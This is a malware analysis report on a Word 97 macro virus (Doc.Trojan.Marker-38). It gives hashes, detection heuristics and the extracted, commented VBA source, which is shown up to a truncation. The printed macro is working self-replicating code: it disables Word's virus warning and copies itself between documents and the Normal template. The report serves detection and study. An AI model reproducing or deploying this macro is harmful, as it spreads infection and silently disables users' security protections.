Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8162604999f2873…

MALICIOUS

Office (OLE)

Size: 37.5 KB · Created: 1997-09-17 11:18:00 · Authoring application: Microsoft Word 8.0 · First seen: 2012-06-14
MD5: a2b9c3e8a908399104d41048b3e2db2e SHA-1: 8ab0d6ae1d65e4d941cc4380782fccfa431cdfac SHA-256: c8162604999f2873772c3446b743a19ff947549a4842316936de10224d3d01f8
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common auto-execution technique in malicious documents. The script turns off Word's virus-protection warning and the prompt to save the Normal template, and searches for the marker string 'BLowMaster' in both the active document and the Normal template, suggesting an attempt to inject or modify VBA code. This indicates a likely attempt to establish persistence or further compromise the system via macro execution.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-38 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-38
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13726 bytes
SHA-256: 7c0b997035b21c97dfa11068286ba3844f3832540b75a4827c63408bf2f5099f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attributes as written by the VBA export: this is the document's
' ThisDocument class module, which is where Word looks for document event
' handlers such as the Document_Open routine below. VB_Base and
' VB_TemplateDerived suggest the module was created from the Normal template
' (consistent with the Normal-template handling further down) — inferred from
' the attribute values only.

' Word runs Document_Open automatically when the document is opened with macros
' enabled; the handler's single statement (after the colon on the same line)
' calls IT below, so no further user interaction is needed. The OLE_VBA_DOCOPEN
' heuristic in the report fires on this handler name.
Private Sub Document_Open(): IT
End Sub
' Entry point reached from Document_Open. Calls the copying routine newf
' (defined below), then sets two Word options that would otherwise alert the
' user. Returns nothing meaningful (the Variant return is never assigned).
Private Function IT()
        
    ' The commented-out block below appears to be an earlier or alternative
    ' variant of the same idea (disabling the Alt+F11 / Alt+F8 shortcuts, the
    ' Tools > Macro menu and, on Word 8/9, the security dialog). It is dead
    ' code in this sample, but the strings are still present in the module
    ' and usable as static indicators.
    'Application.Options.ConfirmConversions = False: Application.EnableCancelKey = wdCancelDisabled
    'FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable: FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    'CommandBars("Tools").Controls("Macro").Enabled = False
    'If Application.Version = 9# Then: CommandBars("Macro").Controls("Security...").Enabled = 0
    'If Application.Version = 8# Then
        'With Application.Options: .VirusProtection = False: .SaveNormalPrompt = False: End With
    'End If
    
    ' Hand off to newf, which compares and copies VBA module text between the
    ' active document and the Normal template.
    newf
    
    ' VirusProtection = False turns off Word's macro warning on document open;
    ' SaveNormalPrompt = False suppresses the "save changes to the Normal
    ' template?" prompt, so a modified Normal template is saved without asking.
    ' Both assignments are good static detection hooks for this family.
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
            
End Function

Private Function newf()

    Dim maker, Oldmaker
    
    maker = "BLowMaster"
    Options.SaveNormalPrompt = False
    Dim SavDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
    Options.SaveNormalPrompt = False
    Oldmaker = "-> this is another maker!"
    Dim newd, nt As Object
    Options.SaveNormalPrompt = False
    
    Set newd = ActiveDocument.VBProject.VBComponents.Item(1)
    Options.SaveNormalPrompt = False
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    Options.SaveNormalPrompt = False
           
    
    DocumentInfected = newd.CodeModule.Find(maker, 1, 1, 10000, 10000)
    Options.SaveNormalPrompt = False
    NormalTemplateInfected = nt.CodeModule.Find(maker, 1, 1, 10000, 10000)
    Options.SaveNormalPrompt = False
    
    
    'Make sure that some conditions are true before we continue infecting anything
    If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
        (ActiveDocument.SaveFormat = wdFormatDocument Or _
        ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
        Options.SaveNormalPrompt = False
        'Infect the NormalTemplate
        If DocumentInfected = True Then
  
            SaveNormalTemplate = NormalTemplate.Saved
            Options.SaveNormalPrompt = False
  
            Mycode = newd.CodeModule.Lines(1, newd.CodeModule.CountOfLines)

            'Write a log file of this NormalTemplate infection
            For I = 1 To Len(Application.UserAddress)
                If Mid(Application.UserAddress, I, 1) <> Chr(13) Then
                    If Mid(Application.UserAddress, I, 1) <> Chr(10) Then
                        UserAddress = UserAddress & Mid(Application.UserAddress, I, 1)
                        Options.SaveNormalPrompt = False
                    End If
                Else
                    UserAddress = UserAddress & Chr(13) & "' "
                    Options.SaveNormalPrompt = False
                End If
            Next I

            Mycode = Mycode & Chr(13) & _
                      "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                      Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
                      "' " & Application.UserName & Chr(13) & _
                      "' " & UserAddress & Chr(13)


            nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
            nt.CodeModule.AddFromString Mycode
    
            If SaveNormalTemplate = True Then NormalTemplate.Save
    
        End If


        'Infect the ActiveDocument
        If NormalTemplateInfected = True And _
            (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
             ActiveDocument.Saved = False) Then
  
            SavDocument = ActiveDocument.Saved
            Options.SaveNormalPrompt = False
    
            Mycode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

            newd.CodeModule.DeleteLines 1, newd.CodeModule.CountOfLines
            newd.CodeModule.AddFromString Mycode
    
            If SavDocument = True Then ActiveDocument.Save
      
      
... (truncated)